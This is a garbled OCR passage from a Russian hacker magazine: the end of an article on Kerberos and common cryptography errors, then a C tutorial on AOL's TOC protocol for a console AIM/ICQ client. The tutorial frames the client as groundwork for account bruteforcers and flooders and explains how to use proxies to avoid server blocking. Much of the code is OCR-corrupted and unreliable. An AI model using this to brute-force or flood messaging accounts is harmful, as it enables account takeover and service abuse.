TGS проводит три проверки: 

©. Сравнивает имя в удостоверении 
с именем в мандате. 

@. Сравнивает временную метку в 
удостоверении со сроком действия 
мандата и с текущим временем. 

@. Сравнивает IP-agpec в удостове- 
рении с |Р-адресом в мандате и |P-ag- 
ресом отправителя сообщения. 


Если все проверки прошли, TGS re- 
нерирует мандат доступа клиента к 
нужному ему серверу. Также служба 
генерирует сеансовый ключ для кли- 
ента и сервера, зашифровывает сеан- 
совым ключом клиента еще и себя, 
отправляет сообщение клиенту. 
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TGS -> Клиент: LLUiuqcppoBatb(C(knu- 
CHT, сервер), С(клиент, TGS)) 

TGS -> Клиент: М(клиент, сервер) 

Клиент расшифровывает первое со- 
общение и извлекает сеансовый 
ключ. Затем генерирует себе новое 
удостоверение и новый сеансовый 
ключ HC, зашифровывает это все 
извлеченным ключом и, вместе с ман- 
датом, отправляет серверу. 

Клиент -> Сервер: Шифро- 
вать(У(клиент)+НС, С(клиент, сервер)) 
Клиент -> Сервер: М(клиент, сервер) 

Сервер выполняет те же три провер- 
ки, что и ТС$. Если все в порядке, то 
сервер извлекает из удостоверения 
новый сеансовый ключ и отправляет 
зашифрованное им текущее время 
клиенту. 

Сервер -> Клиент: Шисфровать({, НС) 


Клиент, получив сообщение, рас- 
шифровывает его и сравнивает мет- 
ку времени с текущим. При совпаде- 
нии начинается обмен сообщениями, 
зашифрованными НС. При новом се- 
ансе связи с этим сервером клиент 
использует имеющийся у него ман- 
дат. Для связи с другим сервером 
клиент снова обращается в TGS. 

Как видишь, атакующий обложен 
со всех сторон :). Если он не знает 
секретный ключ клиента, он беспо- 
мощен. Правда, две атаки в этом слу- 
чае возможны, но их нельзя назвать 
атаками на Kerberos. Первая основа- 
на на том, что часы на всех объектах 
сети должны быть синхронизирова- 
ны с некоторой точность, заложен- 
ной в проверке меток времени. Если 
время сервера будет установлено 
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неправильно, то возможно исполь- 
зование старого удостоверения. Еще 
опаснее атака на программу пользо- 
вателя - замена ее внешней копией, 

которая к тому же сохраняет пароли. 
Но, как ты понимаешь, это характер- 

но для всех 

программ. 


ЧАСТЫЕ ОШИБКИ 

Перейдем к самой насущной теме - 
ошибкам в криптозащите. Чаще всего 
к ним относят человеческий срактор 
(легкие пароли), ошибки практичес- 
кой реализации криптоалгоритмов 
(баги :)), люки и короткие ключи. Так- 
же расскажу о некоторых проблемах, 
не настолько заметных, но не менее 
важных. Если будешь проектировать 
свой протокол, не забудь о них. 


@. Длительность жизни ключей. 
Ключи нужно постоянно обновлять. 
Время жизни асимметричной пары 
зависит от ее размера: чем больше 
ключ, тем дольше его будут подби- 
рать и тем безопаснее его использо- 
вание в отведенный промежуток вре- 
мени. Не рекомендуется использо- 
вать симметричные ключи больше 
одного раза. 

@. Уменьшение криптостойкости 
при генерации ключа из ключевого 
материала. Часто вместо ключа ис- 
пользуется введенный с клавиатуры 
пароль. Категорически не рекоменду- 
ется делать это: множество ключей 
очень сильно сужается, более того, 
становятся возможными атаки по сло- 
варю. В идеале ключ должен быть 
случайным или, по крайней мере, па- 


роль должен подвергаться сложным 
преобразованиям, чтобы результиру- 
ющий ключ прошел все статистичес- 
кие тесты. 

@. Использование собственных ал- 
горитмов. Очень частая ошибка на- 
чинающих. Основное правило крип- 
тографии, сформулированное еще в 
ХХ веке, гласит: "Знание алгоритма 
шифрования не должно снижать 
криптостойкости шифра". Сразу 
вспоминаются программы в ореп 
source: в них повышение защищен- 
ности идет гораздо быстрее, чем в 
закрытом ПО. Мир криптографии 
знает множество "защищенных" зак- 
рытых протоколов (ярчайший при- 
мер - WEP), взломанных из-за их неп- 
родуманности. Противоположный 
пример - стандарт АЕЗ: конкурс был 
долгосрочным и открытым, с привле- 
чением толпы независимых экспер- 
тов. В общем, если ты не окончил 
факультет прикладной математики с 
красным дипломом, то не самодель- 
ничай. Даже если окончил, тоже не 
самодельничай :). 

@. Ошибочный выбор класса крип- 
тоалгоритма. Например, часто вместо 
хэширования используют симметрич- 
ное шифрование на постоянном клю- 
че. Нужно твердо запомнить, что 
шифрование является обратимым 
процессом. 

©. Повторное наложение шифра. 
При использовании поточных шиср- 
ров никогда нельзя применять один и 
TOT же ключевой поток для шифрова- 
ния двух сообщений. В этом случае 
атакующий может перехватить эти со- 
общения и узнать их хог-разность, на 
основе которой обнаруживаются сами 
сообщения. 

О. Хранение ключа вместе с данны- 
ми. Именно это часто становится са- 
мым слабым звеном всей криптосис- 
темы. Зачем взламывать алгоритм 
шифрования, если ключ хранится в 
настройках программы в практически 
незащищенном виде? Идеальный ва- 
риант - хранить ключ на дискете, 
flash'ke или smart-kapTe, всегда выни- 
мать носители из устройства и дер- 
жать их при себе (к слову, именно так 
делают многие из команды Спеца и 
Х :) - прим. Лозовского). 

@. Ошибки проектирования anro- 
ритмов. Самая страшная проблема, и 
на ней стоит остановиться подробнее. 
Перечитаем пункт 3 еще раз. Так вот, 
профессиональные криптографы то- 
же ошибаются. Незадолго до написа- 
ния этой статьи я нашел весьма лю- 
бопытную информацию - читай врез- 
ку "О швейцарских часах" (это было 
очень свежо на момент написания 
статьи, а сейчас, наверное, известно 
всем- прим. Позовского). 

Ну, вот и все. Удачи тебе, если бу- 
дешь составлять свой криптопрото- 
кол. Будут вопросы - пиши, постара- 


юсь ответить. 
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ЗАБЫТЫЙ ПРОТОКОЛ OT AOL) 


Вольф Данияр aka payhash [AcidOptic] 


ЗАБЫТЫЙ 


ПРОТОКОЛ OT AOL 


INSTANT MESSENGER, FLOODER, BRUTEFORCER? ЛЕГКО! 


под кодовым названием TOC vO.1. Об этом будет наш разговор. 


1998-1999 году программисты израильской фирмы Mirabilis написали первую версию протокола ICQ. В то же 
время компания America Online, Inc. (AOL) разработала свою версию протокола мгновенного обмена сообщениями 


ОС разрабатывался как 


протокол передачи 


простых текстовых CO- 


общений в сети интер- 
нет, и старые версии 
AIM работали как раз по этому прото- 
колу. В наше время АМ Client (как и 
ICQ, которая теперь тоже принадле- 
жит AOL) работает с новым протоко- 
лом под кодовым названием OSCAR. 
Зачем нам нужно разбирать старые 
протоколы? Поясняю: серверы AOL и 
по сей день понимают протокол ТОС. 
С какой целью - об этом знают, навер- 
ное, только сами работники AOL. 

Все нам известен замечательный 
клиент Miranda IM. Если повниматель- 
нее рассмотреть исходный код плагина 
aim.dll, то мы увидим, что этот плагин 
использует как раз протокол ТОС ;), а 
не новомодный и навороченный 
OSCAR. 

Ставлю перед собой задачу разоб- 
раться в протоколе ТОС на практике. 
Для того чтобы хоть немного преус- 
петь в обещанном, напишем свой 
простенький 1СО/А!М-клиент, который 
будет подключаться к серверу, аутен- 
тиффицироваться, обрабатывать текс- 
товые сообщения как на прием, так и 
на передачу. 

Какова структура пакета? Пакет сос- 
TOUT из заголовка FLAP и остальных 
данных. 

Длина conan равна шести байтам, 
нулевой байт - это просто звездочка, 
которая соответствует одному байту. 
Следующим идет Егате Туре (тип па- 
кета) - это поле нужно для того, чтобы 
сервис ТОС определил, какой тип па- 
кета к нему пришел и что сделать с 
ним; поле занимает ровно один байт. 
Поле Sequence Number занимает два 
байта и равно номеру отправляемого 
FLAP-naketa. Каждый раз, когда отп- 
равляется cpnan, значение этого поля 


увеличивается на единицу. Послед- 
ний параметр сфлэп-пакета Data 
Length означает длину полезного гру- 
за; размер поля равен двум байтам. 

Какие типы ТОС-пакетов существу- 
ют? (Во FLAP это поле первого байта 
Frame Туре.) 

Наиболее распространены три типа 
пакетов: 

@. SIGNON нужен в процессе авто- 
ризации. 

@. DATA используется в процессе 
основной передачи данных (текст, 
срайлы и T.g.). 

©. KEEP_ALIVE приходит с сервера, 
чтобы проверить, подключен ли кли- 
ент к серверу (см. "Фрагмент 1"). 


ПОДКЛЮЧАЙСЯ! 

и Что же нужно сделать, чтобы 
подключиться к ТОС(АМ)-сервису и 
повисеть на нем? Конечно же, не 
обойтись без приложения, которое 
сначала подключит нас на сервер АМ 
через интернет-сокет (см. "Фрагмент 
2"). Это легко реализуется через 
winsock.dll/winsock2.dll или через хе- 
деры Berkeley (socket.h и т.д.) вызова- 
ми socket и connect. 

Произошло подключение к серверу 
toc.oscar.aol.com порт 9898, теперь 
нужно послать первое приглашение 
сервису AIM в знак того, что некто 
(мы) изъявляет желание немного по- 
общаться. Для этого в сокет просто 
отсылается команда вида 
"FLAPON\r\n\r\n": "Земля-Земля. Я 
Марс. Вызываю вас на чат =)". На этот 
широкий жест сервис АМ должен от- 
ветить пакетом FLAP SIGNON: "Марс, 
это Земля. Аутентифицируйтесь, по- 
жалуйста" (посмотрим на врезку 
"Фрагмент 3"). 


Valid Frame Type Values 


1 SIGNON 


2 DATA 


3 ERROR (Not used by TOC) 


4 SIGNOFF (Not used by TOC) 


Если взять в руки сетевой снифер и 
посниофить тот же плагин gna Miranda 
(aim.dll), мы увидим содержимое рис. 1. 

Здесь FLAP SIGNON - пакет, который 
состоит из флэп-заголовка и груза в 
четыре байта со значением 00 00 00 
01 (сделано именно так, чтобы клиент 
начал проходить авторизацию на сер- 
висе AIM). 

Теперь нужно понять, как мы сфор- 
мируем пакет TOC(AIM) и как переда- 
дим его на сервер. Для этого выделя- 
ют необходимое количество байт в 
памяти, указывают на него указатель, 
и начинают заталкивать в него 
данные, которые отсылаются на сер- 
вер АМ. В основном это FLAP-3arono- 
вок и полезный груз. 

Затем мы выделим место в памяти 
для данных buffer, которые будут при- 
ходить с сервера. Туда уже помести- 
ли, и в зависимости от типа FLAP-3a- 
головка код должен производить те 
или иные манипуляции. 

Объявим несколько несложных 
функций, которые сформируют 
TOC(AIM)-naket. 

С сервера пришел пакет FLAP 
SIGNON, теперь серверу нужно отве- 
тить тем же FLAP SIGNON, но наш 
FLAP SIGNON содержит значение АМ 


5 KEEP_ALIVE 


Offset Size Type 
0 1 ASTERISK (literal ASCII '*') 
1 1 Frame Type 
2 2 Sequence Number 
4 2 Data Length 
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Рис. 2. Дамп с пакетом авторизации на 
ТОС(А!М)-сервере 


Screenname или ICQ ит (врезка 
"Фрагмент 4"). 

Пакет формируется с помощью 
функции encode_flapsigon, следом по- 
сылается пакет toc_signon, сформиро- 
ванный с помощью функции 
encode_toc_signon, в которую nepega- 
ются указатель на буфер buf, АМ 
Screenname или ICQ ит и пароль. 

Если посниорить пакеты, получится 
нечто похожее на рис. 2. 

Пароль в функции 
encode_toc_signon криптуется с по- 
мощью сфункции roast_password мето- 
дом ХОБ'рирования пароля и строки 
"Tic/Toc". В буфер buf записывают ко- 
MaHgy toc_signon; адрес и порт серве- 
ра, на котором ТОС-сервис должен ав- 
торизовать нас; локал-клиента english; 
название клиента. Замаскируем его 
nog Miranda, не забывая записывать в 
конец пакета нулевой символ. 

Если авторизация прошла гладко, то 
сервер ответит пакетом 
SIGN_ON:TOC1.0 (версия протокола). 

После этого в течение ЗО-ти секунд 
на сервер нужно послать команду 
toc_init_done (см. функцию 
encode_toc_init_done). Но мы пойдем 
другим путем :). Если просто отпра- 
вить команду toc_init_done, произой- 
дет обычное подключение к серверу 
и установится статус ivisible: отправ- 
лять и получать сообщения получит- 
ся, но статус будет He online. 

Напишем четыре функции 
encode_toc_add_permit, 
encode_toc_add_deny, 
encode_toc_set_config, 
encode_toc_add_buddy. С помощью 
этих функций в буфере buf соберем 
пакет aim'ma, который запросит для 
Hac contact list и добавит нас в свой 
же контакт, тем самым переведя в ре- 
жим online. Функция 
encode_toc_add_permit создаст зап- 
рос на сервер пользователей, кото- 
рые разрешены в нашем contact list. 
Функция encode_toc_add_deny делает 
все наоборот (ban). 
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nee пакета авторизации на TOC(AIM) 


Функция encode_toc_set_config с no- 
мощью запроса toc_set_config вызо- 
вет с сервера AIM наш contact list, 
encode_toc_add_buddy добавляет се- 
бя в свой же contact list, чтобы по- 
пасть в статус online. И, как я уже пи- 
сал, мы обязаны отправить пакет, 
сформированный функцией 
toc_init_done ("Фрагмент 5"). Посни- 
Cpu, чтобы увидеть полную картину 
происходящего, как на рис. 3. 
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Рис. 3. Дамп пакета, необходимого для 
запроса contact list'a и статуса 


Функциями encode_toc_add_permit и 
encode_toc_add_deny запрашиваются 
пустые ассез$-листы, функцией 
toc_set_config - contact list. Чтобы по- 
лучить статус online, вызываем CPYHK- 
цию encode_toc_add_buddy. 

Итак, все это хозяйство собирается 
в один буфер и отправляется на сер- 
вис АМ ("Фрагмент 4"). Если все сде- 
лано правильно, то сервер должен 
прислать contact list и предоставить 
заветный статус online. 


Ответ с сервера после запроса на соп- 
tact И5Ёи статус 


Остается придумать, как реализо- 
вать прием и отправку сообщений. С 
помощью главного цикла, через кото- 
рый мы будем получать все поступаю- 
щие сообщения и выводить их Ha кон- 
соль ("Фрагмент 6"). Если потребует- 
ся отправить сообщение, сделаем 
прерывание с клавиатуры, и нам бу- 
дет предоставлен терминал по вводу 
текста (см. "Фрагмент 7"). 

Формировать А!М-пакет с сообще- 
нием будем с помощью сункции 
encode_toc_send_im, а все поступаю- 
щие в поток данные занесем в буфер 
buffer. Так как я в основном работаю 
в среде UNIX и клиент у меня консоль- 
ный, я применил систему сигналов. 
Когда код программы уйдет в цикл, 
ожидая входящие сообщения АМ-па- 
кетов, мы установим асинхронное 
прерывание на тот случай, если вдруг 
захочется послать сообщение (см. 
функцию onintr). 


кодим-покодим 

m Ну что же, думаю, с теоретической 
частью покончено, и можно перейти 
непосредственно к водным процеду- 
рам, а именно к кодингу. Правда, весь 
код не мог влезть в статью (это и не 
нужно), поэтому многое было выкину- 


то. Полная версия исходника есть на 
диске к журналу, поэтому начнем сра- 
зу с определения сервера и порта 
AIM, куда нужно подключиться, сер- 
вер и порт авторизации на нем дол- 
жен авторизовать сервис АМ: 


е ТОС_НОЗТ "toc.oscar.aol.com" 

е TOC_PORT 9898 

е АОТН НОЗТ "login.oscar.aol.com" 

е AUTH РОВТ 5190 

ык(локаль) на котором должен общаться 
ш клиент 
е LANGUAGE "english" 

рсия нашего клиента, может быть любое слово. 
е REVISION "Miranda" 
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ременная для шифрования (хогирования) нашего 
пароля, шифровать пароль будем при помощи 
функции roast_password. 


Hdefine ROAST "Tic/Toc" 


Фрагмент 1 


Onpegensem типы флэп-пакета 


Hdefine ТУРЕ УМОМ 1 
Hdefine ТУРЕ ВАТА 2 
Hdefine TYPE_ERROR 3 
Hdefine TYPE_SIGNOFF 4 
Hdefine TYPE_KEEPALIVE 5 


/* Первая команда, которая должна уйти на сервер 
(см. функцию зеп(зоск, FLAPON, sizeof(FLAPON), 0)) */ 
define FLAPON "FLAPON\r\n\r\n" 

// Простой макрос, который будет записывать в Oy- 
pep buf значения в один байт. 

Htdefine writeb(buf, value) (*buf=value, buf++) 


=. 


Простая функция для записи в бу- 
cpep двухбайтовых значений (2х8 раз- 
рядов). Не забываем, что в Сети суще- 
ствует сетевое следование байт, поэ- 
тому мы делаем конверсию функцией 
htons: 


static char *writew(char *buf, u_intl6_t value) 
{ 
7 intl6t *)buf)++ 
eturn buf; 


htons(value); 


Простая функция для записи в бу- 
cpep четырехбайтовых значений (4х8 
разрядов). Опять же делаем конвер- 
сию, но уже при помощи функции 
htonl: 


Static char *writel(char “buf, u_int32_t value) 


о int32_t *)buf)++ = htonl(value); 
eturn buf; 


Простая функция для записи в бу- 
Cpep строковых значений (например 
отправляемое текстовое сообщение). 
Конверсию делать не будем, так как 
запись в буфер будет происходить с 
помощью функции тегпсру по байтам. 
Все необходимое она сделает сама: 
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Консольный icq/aim bruteforcer: очень эффективен для дедикейт-серверов 


Static char “writes(char *buf, const char “data, int len) 
{ 

memcpy(buf, data, len): 

return buf+len; 
} 


Сложная функция по сборке qonan- 
пакета. Видим, что функция использу- 
ет простые функции, которые описа- 
ны выше: 


static char *flap_begin(char “buf, char frame) 
{ 

Static int seq = 0: 

buf = writeb(buf, 0x2A); 

buf = writeb(buf, frame); 

buf = writew(buf, ++seq); 

return buf+2: 
} 


Функция, с помощью которой код 
вычисляет длину данных, идущих пос- 
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ne FLAP (полезный груз), и записыва- 
ет значение в поле Data Length: 


static char *flap_end(char *buf, char *start) 
{ 

start -= 2: 

writew(start, buf-start-2); 

return buf: 
} 


Объявляем функции для сборки 
А!М-пакетов. Я привык писать код в 
старых традициях (oldschool), поэтому 
предпочитаю сначала объявить функ- 
ции, а их описание - после главной 
программы (main): 


static char “encode flapsigon(char *buf, const char 
*screenname), 

static unsigned char *roast_password(const char *pass); 
static char “encode_toc_signon(char *buf, const char 
*screenname, const char “password); 

static unsigned char *encode_toc_init_done(char “Вий; 


~ ide ester i 
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Мощная среда разработки KDEVELOP, фрагмент открытого кода icq flooder с использо- 
ванием POSIX THREAD (многопоточность) 


static unsigned char “encode_toc_send_im(char “buf, 
const char *remscreenname, char *mess): 

Static unsigned char *encode_toc_add_permit(char *buf); 
static unsigned char “encode_toc_add_deny(char “buf); 
static unsigned char “encode_toc_set_config(char *buf); 
static unsigned char *encode_toc_add_buddy(char “buf, 
const char *screenname); 


Tak будем выглядеть функция, KOTO- 
рая будет вызываться при прерыва- 
нии с клавиатуры, например, когда мы 
пожелаем отправить сообщение сами. 


Фрагмент 7 
void onintr(sig){ 


/* Ц, Ha который отправим сообщение. Надо заме- 
тить, что UIN и screenname для AIM одно и то же. */ 
char remscreennamet16]; 


/* Вызываем функцию GAA формирования исходяще- 
го пакета с текстом, в функцию передаются два apry- 
мента Uin и текстовое сообщение. Затем пакет, сфор- 
мированный тривиальным образом, отправляем на 

сервер TOC/AIM: * 
encode toc_send_im(buf, remscreenname, messa); 


— 


i=0; 
i=ntohs(*((u_intl6.t *)(buf+4))); 
if (send(sock, buf, i6, 0) == -1) { 
error("Send"); 
close(sock); 


} 

fprintf(stdout,""%s <- %s\n", remscreenname, messa); 
Il... 
} 

Дамп сформированного исходящего 
сообщения. Состоит из заголовка 
FLAP 6 байт, команды toc_send_im, 
UIN'a и самого текстового сообщения 
(см. скриншот). 


Рассмотрим теперь основную 
функцию - main(). 


Фрагмент 2 


// Производим подключение к АМ-сервису 
if ((sock=socket(AF_INET, SOCK STREAM, 0)) == -1) { 
perror("Socket"); 


ochost.sin_family=AF_INET; 
ochost.sin_port=htons(TOC_PORT); 
ochost.sin_addr=*(struct in_addr *)he->h_addr: 
0(&(tochost.sin_zero), 8): 
printf(stdout, "Connecting TOC server \п"); 
onnect(sock, (struct sockaddr *)&tochost, 
sizeof(struct sockaddr) == -1) { 
perror("'Connect"); 


Посылаем первую команду Ha АМ- 
сервер, дабы рассказать ему о готов- 
ности к работе с ним: 


Фрагмент 3 


if (send(sock, FLAPON, sizeof(FLAPON), 0) == -1) { 
perror("Send"’); 
close(sock); 
} 
/* Принимаем ответ с сервера в виде пакета FLAP 
SIGNON: */ 


—— зы 


Г = oo квы д. 


Проект, посвященный разработчикам ICQ. На снимке - кусок кода открытой функции 


ICQ для формирования пакета login 


В одну строку buf мы формируем сразу 
несколько пакетов ТОС, каждый раз 
смещая указатель на буфер. 


НПЦ ва 


Дамп исходящего сообщения 


if (recv(sock, buffer, 2048, 0) == -1) { 
perror("RECY"); 
close(sock); 


} 


Составляем ответ для сервера в ви- 
де пакета ТОС SIGNON, для этого ди- 
намически выделяем память. При 
этом используем указатель buf. После 
этого отправляем пакет на сервер, ис- 
пользуя функцию Send. Надо отме- 
тить, что аргументы i vj фигурируют 
для определения размера поля VALID 
DATA. 


buf=(char *)malloc(256*sizeof(char )); 
encode_flapsigon(buf, screenname); 
i=0; 

i=ntohs(*((u_intl6_t *)(buf+4))): 

if (send(sock, buf, i+6, 0) == -1) { 
perror("Send"); 

close(sock); 


free(buf); 


Далее следует аутентификация Ha 
сервере - формируем пакет toc_signon 
с помощью функции 
encode_toc_signon. В параметрах пе- 
редаем указатель на адрес буфера, 
наш ICQ uin/AIM screename и пароль к 
нему: 


Фрагмент 4 


buf=(char*) malloc(256*sizeof(char )); 
encode_toc_signon(buf, screenname, password); 
0; 
i=ntohs(*((u_intl6t *)(buf+4))): 
if (send(sock, buf, i+6, 0) == -1) { 
perror("Send"): 
close(sock); 
} 


Фрагмент 5 


На этом участке кода мы немного 
схитрим для повышения производи- 
тельности кода. В противном случае 
придется несколько раз использовать 
срункцию send. Если внимательно пос- 
мотреть на него, можно заметить, что 
в одну строку buf мы формируем сра- 
зу несколько пакетов ТОС, каждый 
раз смещая указатель на буфер. Это 
делается для экономии времени подк- 
лючения к серверу, избавления от 
повторяющихся участков кода и, ко- 
нечно же, для эстетики ;). Поехали. 


encode toc_add_permit, encode toc_add_deny, 
encode_toc_set_config, encode toc_add_buddy, 
encode_toc_set_config, encode_toc_init_done. 


Интересно, что функцию 
encode_toc_init_don мы вызываем в 
конце - так требует стандарт. Конечно, 
можно разделить все и по частям. 


/* toc_add_permit - устанавливаем список разрешен- 
ных пользователей */ 

encode toc_add_permit(buf); 

i=0; 

i=ntohs(*((u_intl6_t *)(buf+4))); 


/* toc_add_deny - устанавливаем список запрещенных 
пользователей */ 
code toc add_de 
=0: 
j=ntohs(*((u_intl6_t *)((buf+i+6)+4))); 
ЕН} 
/* toc_set config - устанавливаем contact list */ 
encode_toc_set_config(bufti+12); 

j=0; 
j=ntohs(*((u_intl6_t *)((buf+i+l2)+4))); 
ЕН; 
/* toc_add_buddy - добавляем себя в contact list и op- 
ганизуем статус online */ 

encode _toc_add_buddy((buf+i+18), screenname); 

j=0; 
j=ntohs(*((u_intl6_t *)((buf+i+18)+4))); 


= 


y(buf+i+6); 


БИС: =] 


/rtoc зе contig *| 

encode _toc_set_config(buf+i+24); 
|=0; 

=ntohs(*((u_intl6_t *)((buf+i+24)+4))); 

Мос И done - подтверждаем, что пройдена проце- 
дура авторизации */ 

encode_toc_init_done(buf+i+30); 

j=0: 
j=ntohs(*((u_intl6_t *)((buf+i+30)+4))); 
ЕН; 
if (send(sock, buf, #36, 0) == -1) { 
perror("'Send"); 

close(sock); 


т. 


ree(buf); 
puts(""Now you connect on the TOC server"): 
uts("Press ctrl+c you menu"); 

uf=(char )malloc(256*sizeof(char )): 
ness=(char )malloc(128*sizeof(char )); 


ignal (SIGINT, onintr); 


a 


Уходим в главный цикл нашей npor- 
раммы, переводя программу в режим 
приема сообщений до тех пор, пока 
аргумент messa не станет равным 
"quit", после чего программа выйдет 
из цикла и завершится: 


while (memcmp(messa, "quit", 4)) { 
Il... 
} 


Фрагмент 6 


if (recv(sock, buffer, 2048, 0) == -1) { 
perror("RECV"); 
close(sock); 

} 


Условие на наличие входящего со- 
общения. В условии используется ло- 
гическое "И". Первое выражение B if - 
это наличие аргумента DATA(OxO2) в 
FLAP. Во втором выражении сверяют- 
ся первые пять символов, после 
флэп-заголовка (6 bytes), IM_IN - вхо- 
дящее сообщение. Если проверка 
подтвердится, то входящая строка по- 
падает в тело условия: 


if( (*((u_int8_t *)(buffer+1)) == 0x02) && 
(Imemcmp(buffer+6, "IM_IN", 5) ) { 
he 


} 
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После того как строка попала в тело 
условия, из нее выделяются ICQ/AIM 
(screenname) и сообщение. 


screenlen = 0; 


Отсчитываем 12 байт от начала паке- 
та TOC(AIM), чтобы определить 
|СО/5сгееппате-отправителя сообще- 
ния, сохраняем его в переменной гет- 
screenname. 


address = (buffer+12); 

while(*address |= '\иЗА') { 
remscreenname(screenlen] = (*address); 
screenlen++: 
address++: 

} 


Отделяем текстовое сообщение из 
входящего пакета и записываем его в 
аргумент те55ада: 


address++; 

i=0; 

i=ntohs(*((u_intl6t *)(buf+4))): 
i=i-6-screenlen-1; 
memset(messaga, 0, 128); 
memcpy(messaga, address, i); 


Выводим входящие ICQ/screename и 
текст сообщения на стандартный 
вывод: 


printf("%s -> %s\n", remscreenname, messaga); 


На это заканчивается код главной 
функции main. 

Функции для формирования АМ- 
протокола: 


/* Формируем ответ серверу Ha FLAP SIGON. В полез 
ном грузе будет значение 

000000001, 0x0001, длина UIN и сам UIN. */ 

static char *encode_flapsigon(char “buf, const char 
*screenname) 

{ 

char *sflap; 

/* Пропускаем none Data Length и ставим на него 
указатель, дабы позже заполнить его. */ 
buf=sflap=flap_begin(buf, TYPE_SIGNON); 
buf=writel(buf, 0x00000001); 

buf=writew(buf, 0x0001); 

buf=writew(buf, strlen(screenname)): 
buf=writes(buf, screenname, strlen(screenname)): 
// подсчитываем длину пакета и вписываем 

// его в none Data Length 

flap_end(buf, sflap); 

return buf; 


Криптуем наш пароль (просто 
хог'ируем его) в виде начальных дан- 
ных, необходимых для шифрования, 
берем строку "Tic/Toc", после чего по- 
лучим ключ: 


static unsigned char *roast_password(const char *разз) 


{ 
static unsigned char гр[256]; 
static char *roast = ROAST; 
int pos = 2; 
int x; 
strepy(rp, "Ох"); 
for (x = 0; (x < 150) && pass[x]; x++) 
pos += sprintf(&rp(pos], "%02x", 
pass[x] ^ roast[x % strlen(roast)]); 
rp[pos] = "\0' 
return rp; 
} 


Функция конструирует пакет, с по- 
мощью которого будем проходить ау- 
тентификацию. 


static char “encode toc signon(char “buf, const char 
*screenname, const char “password) 
{ 
char *sflap; char *data; 
data=(char *)malloc(256*sizeof(char *)); 
memset(data, 0, 256); 
buf=sflap=flap_begin(buf, TYPE_DATA); 
sprintf(data, 
"toc_signon %s %d %s %s %s \"%5\"", 
AUTH_HOST, AUTH PORT, screenname, 
roast_password(password), LANGUAGE, 
REVISION); 
buf=writes(buf, data, strlen(data)); 
buf=writeb(buf, 0x00); 
flap_end(buf, sflap); 
free(data); 
return buf; 


Функция по формированию пакета 
сообщений (текст). Аргументы ‹функ- 
ции - это выделенный буфер в памяти 
buf, ICQ/AIM(screenname)-agpecata и 
текстовое сообщение Mess. 


static unsigned char *encode_toc_send_im(char “buf, 
const char *remscreenname, char *mess) 


char *sflap, *message; 

message=(char )malloc(128* sizeof(char *)); 

memset(message, 0, 128); 

buf=sflap=flap_begin(buf, ТУРЕ ОАТА); 

sprintf(message, "toc_send_im %s \"%s\", 
remscreenname, mess); 

buf=writes(buf, message, strlen(message)): 

buf=writeb(buf, 0x00); 

flap_end(buf, sflap); 

free(message); 
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Дамп входящего сообщения. Первые шесть байт FLAP (второй байт в FLAP Frame 


Туре РАТА(0хО2)), [49 4D 5F 49 4E] (IM_IN)DATA входящих сообщений, ЗА - двоето- 
чие, [39 36 33 36 33 32] ICQ/screenname 632632. Дальше идут флаги и сам текст со- 
общения 


return buf: 


Функция по добавлению разрешен- 
ных пользователей: 


static unsigned char “encode_toc_add_permit(char *buf) 


char *sflap; 
buf=sflap=flap_begin(buf, ТУРЕ ВАТА); 
buf=writes(buf, "toc_add_permit ", 
strlen("toc_add_permit ")); 
buf=writeb(buf, 0x00); 

flap_end(buf, sflap); 

return buf; 


Функция по добавлению пользова- 
теля в черный список: 


static unsigned char “encode_toc_add_deny(char *buf) 
{ 
char *sflap; 
buf=sflap=flap_beain(buf, ТУРЕ ВАТА); 
buf=writes(buf, "toc_add_deny ", 
strlen("toc_add_deny ")); 
buf=writeb(buf, 0x00); 
flap_end(buf, sflap); 
return buf; 


Функция по установке статуса поль- 
зователя, обычно она запрашивает 
contact list: 


static unsigned char “encode toc_set_config(char “buf) 
{ 

char "Нар, “message; 

message=(char *)malloc(128*sizeof(char *)); 
memset(message, 0, 128); 
buf=sflap=flap_beain(buf, ТУРЕ ВАТА); 
sprintf(message, "toc_set_config {Yc %d.%c 
General.}", 'm', 4, 'g'); 
buf=writes(buf, message, strlen(message)): 
buf=writeb(buf, 0x00); 

flap_end(buf, sflap): 

free(message); 

return buf; 


+ 


Добавление пользователя в contact 
list. Если в виде параметра к команде 
toc_add_buddy выступает твой (ЛМ 
или SN, то ты обретаешь статус online. 


static unsigned char “encode toc_add_buddy(char "Би, 
const char *screenname) 
{ 


char *sflap, *message; 

message=(char )malloc(128*sizeof(char)); 
buf=sflap=flap_begin(buf, ТУРЕ ВАТА); 
sprintf(message, "toc_add_buddy %s", screenname); 
buf=writes(buf, message, strlen(message)): 
buf=writeb(buf, 0x00); 

flap_end(buf, sflap): 

free(message); 

return buf; 


Функция формирует пакет в виде 
команды готовности к работе приема, 
передачи сообщений. 

Обычно посылается после аутенти- 
фикации на сервисе aima. 


А ЧТО ЖЕ ДАЛЬШЕ? 

ш Пожалуй, с протоколом немного 
разобрались. Необходимая база у 
нас есть, какую пользу мы можем 
извлечь из всего этого? Конечно же, 
я имею в виду написание bruteforce 
ICQ/AIM UIN'oB или ICQ/AIM flood. Но 
знание одного протокола не помо- 
жет, нужна еще одна важная вещь: 
если производить прямые активные 
действия с сервером ICQ/AIM (brute- 
force, flood), сервер попросту 3a6no- 
чит номер Ha некоторое время. Поэ- 
тому как в случае с bruteforce, так и 
в случае с flood нужно использовать 
косвенное соединение через ргоху. 

Кратко поясню, как происходит ра- 
бота через ргоху-сервер на уровне 
сетевого протокола. Для работы с 
сервером через косвенное (ргоху) 
соединение необходимо подключит- 
ся к ргоху-серверу и отослать ему ко- 
MaHgy (определенного формата) для 
установки соединения с реальным 
сервером, используя метод CON- 
МЕСТ (в нашем случае это 
toc.oscar.aol.com). Так выглядит дамп 
пакета уровня приложений для рабо- 
ты с ргоху-сервером: 

Если подключение с сервером че- 
рез ргоху произошло удачно, то в от- 
вет мы получим пакет СоппесНоп 
established. После этого с proxy мож- 
но работать так, как будто бы мы 
подключились к серверу 
toc.oscar.aol.com напрямую. 

На компакт-диске есть заголовоч- 
ный файл proxy.h и исходные коды 
однопоточного ICQ bruteforce, рабо- 


тающего по протоколу ICQ OSCAR с 
использованием ргоху. Его можно 
использовать в любых приложениях, 
которые нуждаются в работе с ргоху- 
сервером. Снова оговорюсь для тех, 
кто разбирается в сетевом програм- 
мировании: тут нет ничего особенно- 
го - обычный Sockconnect. Поэтому 
ничего комментировать не буду. Код 
выполняет обычные действия, уже 
описанные мной. 

Итак, с ргоху все просто. Для при- 
мера рассмотрим принцип работы icq 
шп bruteforce. 

Первое, что нужно сделать, - подк- 
лючиться к серверу ТОС (АМ) через 
